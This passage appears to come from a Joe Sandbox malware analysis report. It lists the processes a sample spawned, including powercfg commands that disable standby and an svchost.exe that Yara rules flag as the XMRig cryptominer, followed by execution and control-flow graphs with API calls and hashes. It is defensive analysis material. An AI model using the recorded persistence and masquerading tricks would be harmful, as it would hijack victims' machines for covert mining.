                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:59
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:60
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:svchost.exe
                                                          Imagebase:0x7ff7e52b0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          Has exited:false

                                                          Target ID:62
                                                          Start time:10:36:30
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                          Imagebase:0x7ff7e52b0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.8%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:23.4%
                                                            Total number of Nodes:192
                                                            Total number of Limit Nodes:2
                                                            execution_graph 1217 7ff6f1fb1440 1221 7ff6f1fb1394 1217->1221 1219 7ff6f1fb144f 1220 7ff6f1fb1394 2 API calls 1219->1220 1222 7ff6f1fb9f40 malloc 1221->1222 1223 7ff6f1fb13b8 1222->1223 1224 7ff6f1fb13c6 NtCloseObjectAuditAlarm 1223->1224 1224->1219 1432 7ff6f1fb1800 1433 7ff6f1fb1812 1432->1433 1434 7ff6f1fb1835 fprintf 1433->1434 1435 7ff6f1fb1000 1436 7ff6f1fb108b __set_app_type 1435->1436 1437 7ff6f1fb1040 1435->1437 1438 7ff6f1fb10b6 1436->1438 1437->1436 1439 7ff6f1fb10e5 1438->1439 1441 7ff6f1fb1e00 1438->1441 1442 7ff6f1fba4f0 __setusermatherr 1441->1442 1443 7ff6f1fb1404 1444 7ff6f1fb1394 2 API calls 1443->1444 1445 7ff6f1fb2104 1446 7ff6f1fb2111 EnterCriticalSection 1445->1446 1447 7ff6f1fb2218 1445->1447 1448 7ff6f1fb220b LeaveCriticalSection 1446->1448 1453 7ff6f1fb212e 1446->1453 1449 7ff6f1fb2272 1447->1449 1451 7ff6f1fb2241 DeleteCriticalSection 1447->1451 1452 7ff6f1fb2230 free 1447->1452 1448->1447 1450 7ff6f1fb214d TlsGetValue GetLastError 1450->1453 1451->1449 1452->1451 1452->1452 1453->1448 1453->1450 1258 7ff6f1fb6585 1261 7ff6f1fb2df0 1258->1261 1273 7ff6f1fb2660 1261->1273 1264 7ff6f1fb2e3c 1275 7ff6f1fb2690 1264->1275 1274 7ff6f1fb266f memset 1273->1274 1274->1264 1310 7ff6f1fb155d 1275->1310 1311 7ff6f1fb1394 2 API calls 1310->1311 1354 7ff6f1fb1ac3 1355 7ff6f1fb1a70 1354->1355 1356 7ff6f1fb199e 1355->1356 1357 7ff6f1fb1b36 1355->1357 1360 7ff6f1fb1b53 1355->1360 1358 7ff6f1fb1a0f 1356->1358 1361 7ff6f1fb19e9 VirtualProtect 1356->1361 1359 7ff6f1fb1ba0 4 API calls 1357->1359 1359->1360 1361->1356 1225 7ff6f1fb2050 1226 7ff6f1fb205e EnterCriticalSection 1225->1226 1227 7ff6f1fb20cf 1225->1227 1228 7ff6f1fb20c2 LeaveCriticalSection 1226->1228 1229 7ff6f1fb2079 1226->1229 1228->1227 1229->1228 1230 7ff6f1fb20bd free 1229->1230 1230->1228 1362 7ff6f1fb1fd0 1363 7ff6f1fb1fe4 1362->1363 1364 7ff6f1fb2033 1362->1364 1363->1364 1365 7ff6f1fb1ffd EnterCriticalSection LeaveCriticalSection 1363->1365 1365->1364 1454 7ff6f1fb1e10 1455 7ff6f1fb1e2f 1454->1455 1456 7ff6f1fb1e55 1455->1456 1457 7ff6f1fb1ecc 1455->1457 1458 7ff6f1fb1eb5 1455->1458 1456->1458 1462 7ff6f1fb1f12 signal 1456->1462 1457->1458 1459 7ff6f1fb1ed3 signal 1457->1459 1459->1458 1460 7ff6f1fb1ee4 1459->1460 1460->1458 1461 7ff6f1fb1eea signal 1460->1461 1461->1458 1462->1458 1171 7ff6f1fb1394 1175 7ff6f1fb9f40 1171->1175 1173 7ff6f1fb13b8 1174 7ff6f1fb13c6 NtCloseObjectAuditAlarm 1173->1174 1176 7ff6f1fb9f5e 1175->1176 1179 7ff6f1fb9f8b 1175->1179 1176->1173 1177 7ff6f1fba033 1178 7ff6f1fba04f malloc 1177->1178 1180 7ff6f1fba070 1178->1180 1179->1176 1179->1177 1180->1176 1312 7ff6f1fb2f88 1315 7ff6f1fb14a9 1312->1315 1316 7ff6f1fb1394 2 API calls 1315->1316 1317 7ff6f1fb158a 1318 7ff6f1fb1394 2 API calls 1317->1318 1319 7ff6f1fb1599 1318->1319 1320 7ff6f1fb1394 2 API calls 1319->1320 1321 7ff6f1fb118b 1322 7ff6f1fb1190 1321->1322 1323 7ff6f1fb11b9 _amsg_exit 1321->1323 1322->1323 1324 7ff6f1fb11a0 Sleep 1322->1324 1326 7ff6f1fb11fa 1323->1326 1324->1322 1324->1323 1327 7ff6f1fb1201 _initterm 1326->1327 1328 7ff6f1fb121a 1326->1328 1327->1328 1329 7ff6f1fb1880 5 API calls 1328->1329 1330 7ff6f1fb1247 SetUnhandledExceptionFilter 1329->1330 1331 7ff6f1fb126a 1330->1331 1332 7ff6f1fb126f malloc 1331->1332 1333 7ff6f1fb128b 1332->1333 1334 7ff6f1fb12a0 strlen malloc memcpy 1333->1334 1334->1334 1335 7ff6f1fb12d0 1334->1335 1336 7ff6f1fb132d _cexit 1335->1336 1337 7ff6f1fb1338 1335->1337 1336->1337 1409 7ff6f1fb38e0 wcslen 1417 7ff6f1fb157b 1409->1417 1418 7ff6f1fb1394 2 API calls 1417->1418 1463 7ff6f1fb2320 strlen 1464 7ff6f1fb2337 1463->1464 1338 7ff6f1fb219e 1339 7ff6f1fb2272 1338->1339 1340 7ff6f1fb21ab EnterCriticalSection 1338->1340 1341 7ff6f1fb2265 LeaveCriticalSection 1340->1341 1343 7ff6f1fb21c8 1340->1343 1341->1339 1342 7ff6f1fb21e9 TlsGetValue GetLastError 1342->1343 1343->1341 1343->1342 1419 7ff6f1fb15e4 1420 7ff6f1fb1394 2 API calls 1419->1420 1421 7ff6f1fb15f3 1420->1421 1238 7ff6f1fb1e65 1239 7ff6f1fb1e67 signal 1238->1239 1240 7ff6f1fb1e7c 1239->1240 1242 7ff6f1fb1e99 1239->1242 1241 7ff6f1fb1e82 signal 1240->1241 1240->1242 1241->1242 1181 7ff6f1fb11d8 1182 7ff6f1fb11fa 1181->1182 1183 7ff6f1fb1201 _initterm 1182->1183 1184 7ff6f1fb121a 1182->1184 1183->1184 1194 7ff6f1fb1880 1184->1194 1187 7ff6f1fb126a 1188 7ff6f1fb126f malloc 1187->1188 1189 7ff6f1fb128b 1188->1189 1190 7ff6f1fb12a0 strlen malloc memcpy 1189->1190 1190->1190 1191 7ff6f1fb12d0 1190->1191 1192 7ff6f1fb132d _cexit 1191->1192 1193 7ff6f1fb1338 1191->1193 1192->1193 1195 7ff6f1fb1247 SetUnhandledExceptionFilter 1194->1195 1196 7ff6f1fb18a2 1194->1196 1195->1187 1196->1195 1197 7ff6f1fb194d 1196->1197 1202 7ff6f1fb1a20 1196->1202 1198 7ff6f1fb199e 1197->1198 1199 7ff6f1fb1956 1197->1199 1198->1195 1201 7ff6f1fb19e9 VirtualProtect 1198->1201 1199->1198 1207 7ff6f1fb1ba0 1199->1207 1201->1198 1202->1198 1203 7ff6f1fb1b5c 1202->1203 1204 7ff6f1fb1b36 1202->1204 1205 7ff6f1fb1ba0 4 API calls 1204->1205 1206 7ff6f1fb1b53 1205->1206 1206->1203 1209 7ff6f1fb1bc2 1207->1209 1210 7ff6f1fb1c45 VirtualQuery 1209->1210 1211 7ff6f1fb1cf4 1209->1211 1216 7ff6f1fb1c04 memcpy 1209->1216 1210->1211 1215 7ff6f1fb1c72 1210->1215 1212 7ff6f1fb1d23 GetLastError 1211->1212 1214 7ff6f1fb1d37 1212->1214 1213 7ff6f1fb1ca4 VirtualProtect 1213->1212 1213->1216 1215->1213 1215->1216 1216->1199 1243 7ff6f1fb1a70 1245 7ff6f1fb199e 1243->1245 1248 7ff6f1fb1a7d 1243->1248 1244 7ff6f1fb1a0f 1245->1244 1246 7ff6f1fb19e9 VirtualProtect 1245->1246 1246->1245 1247 7ff6f1fb1b53 1248->1243 1248->1247 1249 7ff6f1fb1b36 1248->1249 1250 7ff6f1fb1ba0 4 API calls 1249->1250 1250->1247 1251 7ff6f1fb216f 1252 7ff6f1fb2185 1251->1252 1253 7ff6f1fb2178 InitializeCriticalSection 1251->1253 1253->1252 1344 7ff6f1fb1ab3 1345 7ff6f1fb1a70 1344->1345 1345->1344 1346 7ff6f1fb1b36 1345->1346 1348 7ff6f1fb199e 1345->1348 1350 7ff6f1fb1b53 1345->1350 1349 7ff6f1fb1ba0 4 API calls 1346->1349 1347 7ff6f1fb1a0f 1348->1347 1351 7ff6f1fb19e9 VirtualProtect 1348->1351 1349->1350 1351->1348 1467 7ff6f1fb6628 1470 7ff6f1fb6635 1467->1470 1468 7ff6f1fb6792 wcslen 1469 7ff6f1fb67a8 1468->1469 1475 7ff6f1fb67ec 1468->1475 1471 7ff6f1fb67c0 _wcsnicmp 1469->1471 1470->1468 1472 7ff6f1fb67d6 wcslen 1471->1472 1471->1475 1472->1471 1472->1475 1473 7ff6f1fb6959 memset wcscpy wcscat 1474 7ff6f1fb69ad 1473->1474 1499 7ff6f1fb3350 memset 1474->1499 1475->1473 1500 7ff6f1fb35c1 memset 1499->1500 1510 7ff6f1fb33c3 1499->1510 1502 7ff6f1fb35e6 1500->1502 1501 7ff6f1fb343a memset 1501->1510 1503 7ff6f1fb362b wcscpy wcscat wcslen 1502->1503 1504 7ff6f1fb1422 2 API calls 1503->1504 1506 7ff6f1fb3728 1504->1506 1505 7ff6f1fb3493 wcscpy wcscat wcslen 1517 7ff6f1fb1422 1505->1517 1508 7ff6f1fb3767 1506->1508 1519 7ff6f1fb1431 1506->1519 1515 7ff6f1fb14c7 1508->1515 1510->1500 1510->1501 1510->1505 1512 7ff6f1fb145e 2 API calls 1510->1512 1514 7ff6f1fb3579 1510->1514 1512->1510 1514->1500 1516 7ff6f1fb1394 2 API calls 1515->1516 1518 7ff6f1fb1394 2 API calls 1517->1518 1520 7ff6f1fb1394 2 API calls 1519->1520

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                            • String ID: &$;*
                                                            • API String ID: 2643109117-510990765
                                                            • Opcode ID: f214d2cb23ad4a7d8a6f2e16a4dc08a5006247cdfdc4fc33eaf7806aa3e5334d
                                                            • Instruction ID: 73f04081b0114d3efbb2d9ac781ebff4844a0c18635b3e3613e21737ebfda6cd
                                                            • Opcode Fuzzy Hash: f214d2cb23ad4a7d8a6f2e16a4dc08a5006247cdfdc4fc33eaf7806aa3e5334d
                                                            • Instruction Fuzzy Hash: EF41F131E1E64785FB10EB15E95527923E5BF897E8F445031CAADC37E2FF6CA8418610

                                                            Control-flow Graph

                                                            APIs
                                                            • NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F1FB1156), ref: 00007FF6F1FB13F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: AlarmAuditCloseObject
                                                            • String ID:
                                                            • API String ID: 2871759311-0
                                                            • Opcode ID: 59d44b6da759f21b666a868a4e6a88dd90aa5652e3e5bdc8205d5884860000a3
                                                            • Instruction ID: 89f5f0c60662be5672ec6f83c237a5480ff410af56faf06e123740b1649ac4d8
                                                            • Opcode Fuzzy Hash: 59d44b6da759f21b666a868a4e6a88dd90aa5652e3e5bdc8205d5884860000a3
                                                            • Instruction Fuzzy Hash: D5F0EC7190EB4782D710CB51F85502A77E0FB483E0B004835E9AE8776AEF3CE0509B40

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 42 7ff6f1fb6628-7ff6f1fb662f 43 7ff6f1fb6635-7ff6f1fb66f6 42->43 44 7ff6f1fb66fd-7ff6f1fb673c call 7ff6f1fb39b0 42->44 43->44 47 7ff6f1fb80d0-7ff6f1fb810c call 7ff6f1fb1370 44->47 48 7ff6f1fb6742-7ff6f1fb6749 44->48 51 7ff6f1fb674b-7ff6f1fb678b 47->51 56 7ff6f1fb8112 47->56 50 7ff6f1fb6792-7ff6f1fb67a2 wcslen 48->50 48->51 52 7ff6f1fb68d8-7ff6f1fb68da 50->52 53 7ff6f1fb67a8-7ff6f1fb67b7 50->53 51->50 57 7ff6f1fb68e0-7ff6f1fb68e7 52->57 55 7ff6f1fb67c0-7ff6f1fb67d0 _wcsnicmp 53->55 58 7ff6f1fb67d6-7ff6f1fb67ea wcslen 55->58 59 7ff6f1fb68dc 55->59 56->50 60 7ff6f1fb8117-7ff6f1fb813d call 7ff6f1fb99e0 call 7ff6f1fb1370 57->60 61 7ff6f1fb68ed-7ff6f1fb68f4 57->61 58->55 62 7ff6f1fb67ec 58->62 59->57 65 7ff6f1fb68f6-7ff6f1fb6952 60->65 72 7ff6f1fb8143 60->72 64 7ff6f1fb6959-7ff6f1fb6a27 memset wcscpy wcscat call 7ff6f1fb2f70 call 7ff6f1fb3350 call 7ff6f1fb14c7 _time64 srand _time64 memset 61->64 61->65 62->57 76 7ff6f1fb8148-7ff6f1fb818a call 7ff6f1fb1370 64->76 77 7ff6f1fb6a2d-7ff6f1fb6a34 64->77 65->64 72->64 78 7ff6f1fb6a36-7ff6f1fb6a76 76->78 86 7ff6f1fb8190 76->86 77->78 79 7ff6f1fb6a7d-7ff6f1fb6a8d wcslen 77->79 78->79 81 7ff6f1fb6a8f-7ff6f1fb6a9b 79->81 82 7ff6f1fb6ac9-7ff6f1fb6acb 79->82 84 7ff6f1fb6aa0-7ff6f1fb6ab0 _wcsnicmp 81->84 85 7ff6f1fb6ad1-7ff6f1fb6afb wcscat memset 82->85 87 7ff6f1fb6ab2-7ff6f1fb6ac5 wcslen 84->87 88 7ff6f1fb6acd 84->88 89 7ff6f1fb6da0-7ff6f1fb6da7 85->89 90 7ff6f1fb6b01-7ff6f1fb6b44 rand 85->90 86->79 87->84 91 7ff6f1fb6ac7 87->91 88->85 92 7ff6f1fb8195-7ff6f1fb81e0 call 7ff6f1fb1370 89->92 93 7ff6f1fb6dad-7ff6f1fb6db4 89->93 90->89 94 7ff6f1fb6b4a-7ff6f1fb6b51 90->94 91->85 97 7ff6f1fb6db6-7ff6f1fb6e09 92->97 108 7ff6f1fb81e6 92->108 96 7ff6f1fb6e10-7ff6f1fb6e3f wcscpy wcscat 93->96 93->97 98 7ff6f1fb82f5-7ff6f1fb8340 call 7ff6f1fb1370 94->98 99 7ff6f1fb6b57-7ff6f1fb6b5e 94->99 102 7ff6f1fb6e45-7ff6f1fb6e4c 96->102 103 7ff6f1fb81eb-7ff6f1fb8211 call 7ff6f1fb9d30 call 7ff6f1fb1370 96->103 97->96 104 7ff6f1fb6b60-7ff6f1fb6bb3 98->104 117 7ff6f1fb8346 98->117 99->104 105 7ff6f1fb6bba-7ff6f1fb6be9 wcscpy wcscat 99->105 111 7ff6f1fb6eff-7ff6f1fb6f06 102->111 112 7ff6f1fb6e52-7ff6f1fb6ef8 102->112 103->112 139 7ff6f1fb8217 103->139 104->105 106 7ff6f1fb6bef-7ff6f1fb6bf6 105->106 107 7ff6f1fb834b-7ff6f1fb8371 call 7ff6f1fb9b10 call 7ff6f1fb1370 105->107 113 7ff6f1fb6ca9-7ff6f1fb6cb0 106->113 114 7ff6f1fb6bfc-7ff6f1fb6ca2 106->114 107->114 149 7ff6f1fb8377 107->149 108->96 115 7ff6f1fb6f0c-7ff6f1fb6f13 111->115 116 7ff6f1fb821c-7ff6f1fb825e call 7ff6f1fb1370 111->116 112->111 122 7ff6f1fb6cb6-7ff6f1fb6cbd 113->122 123 7ff6f1fb837c-7ff6f1fb83be call 7ff6f1fb1370 113->123 114->113 120 7ff6f1fb6f15-7ff6f1fb6f55 115->120 121 7ff6f1fb6f5c-7ff6f1fb6f63 115->121 116->120 141 7ff6f1fb8264 116->141 117->105 120->121 127 7ff6f1fb8269-7ff6f1fb82a3 memcpy call 7ff6f1fb1370 121->127 128 7ff6f1fb6f69-7ff6f1fb6f70 121->128 129 7ff6f1fb6cbf-7ff6f1fb6cff 122->129 130 7ff6f1fb6d06-7ff6f1fb6d0d 122->130 123->129 150 7ff6f1fb83c4 123->150 135 7ff6f1fb6f76-7ff6f1fb6f92 127->135 152 7ff6f1fb82a9 127->152 128->135 136 7ff6f1fb711b-7ff6f1fb7144 128->136 129->130 137 7ff6f1fb6d13-7ff6f1fb6d1a 130->137 138 7ff6f1fb83c9-7ff6f1fb8403 memcpy call 7ff6f1fb1370 130->138 145 7ff6f1fb6fa0-7ff6f1fb6fce 135->145 148 7ff6f1fb7291-7ff6f1fb72aa call 7ff6f1fb39b0 136->148 146 7ff6f1fb6d20-7ff6f1fb6d3c 137->146 147 7ff6f1fb7268-7ff6f1fb728a 137->147 138->146 158 7ff6f1fb8409 138->158 139->111 141->121 154 7ff6f1fb6fd0-7ff6f1fb6ffa 145->154 155 7ff6f1fb6ffc-7ff6f1fb7114 145->155 156 7ff6f1fb6d40-7ff6f1fb6d6e 146->156 147->148 162 7ff6f1fb72b6-7ff6f1fb72d2 148->162 163 7ff6f1fb72b1 call 7ff6f1fb145e 148->163 149->113 150->130 152->136 154->145 155->136 159 7ff6f1fb6d74-7ff6f1fb6d9e 156->159 160 7ff6f1fb7149-7ff6f1fb7261 156->160 158->147 159->156 160->147 163->162
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: _time64wcslen$_wcsnicmpmemsetsrandwcscatwcscpy
                                                            • String ID: X&
                                                            • API String ID: 2454069949-221892188
                                                            • Opcode ID: d1337906cd7b87a5fc8dec7907ca3527d0c29fd3263de3f14483aafe266232c2
                                                            • Instruction ID: e6d879370e57bc6c13e2aba03982ac47596132c93549614b3380d5f66fab3475
                                                            • Opcode Fuzzy Hash: d1337906cd7b87a5fc8dec7907ca3527d0c29fd3263de3f14483aafe266232c2
                                                            • Instruction Fuzzy Hash: 96827F51C2E69384F711CF29E9123B863A0BF95398F445232D9ADD26F1FFACA945C704

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                            • String ID: &$;*
                                                            • API String ID: 3825114775-510990765
                                                            • Opcode ID: bb6b8f63c8978df2cb712fb4502542c6b0eedd4902725eabed431cc5bfcc8d57
                                                            • Instruction ID: 424661b50ab6ab28d33a60154714a4640ac580793488cad6f4d48ad3898331c5
                                                            • Opcode Fuzzy Hash: bb6b8f63c8978df2cb712fb4502542c6b0eedd4902725eabed431cc5bfcc8d57
                                                            • Instruction Fuzzy Hash: F9410571E1EA4784FB11DB19E9652B923E1BF897E8F444031C9ADC32E2FF6CA8418710

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscatwcscpywcslen
                                                            • String ID: $0$0$@$@
                                                            • API String ID: 4263182637-1413854666
                                                            • Opcode ID: 62e16f804d0a78f42930f5485aab4d55bda2c88156d1efd01dd84db9e24e5fef
                                                            • Instruction ID: 6f04229e4f592da45a7ba70c5dbc9a14c85bd199c140eb6d9b8889ac27a7ab0c
                                                            • Opcode Fuzzy Hash: 62e16f804d0a78f42930f5485aab4d55bda2c88156d1efd01dd84db9e24e5fef
                                                            • Instruction Fuzzy Hash: C2B17E2191D6C285F721CB25E8163AAB7A0FF85398F400235EAD8D7AE5EFBDD5458B00

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                            • String ID: 0$X$`
                                                            • API String ID: 329590056-2527496196
                                                            • Opcode ID: 7bd2d40a281e62959ce0fd44c16303bd5a4e704b549ab88744f3f2b4b0171fba
                                                            • Instruction ID: 195ec5b534d4aca2d8cec8208204f37997f6ed06f16df7b61f12f293ad703bf1
                                                            • Opcode Fuzzy Hash: 7bd2d40a281e62959ce0fd44c16303bd5a4e704b549ab88744f3f2b4b0171fba
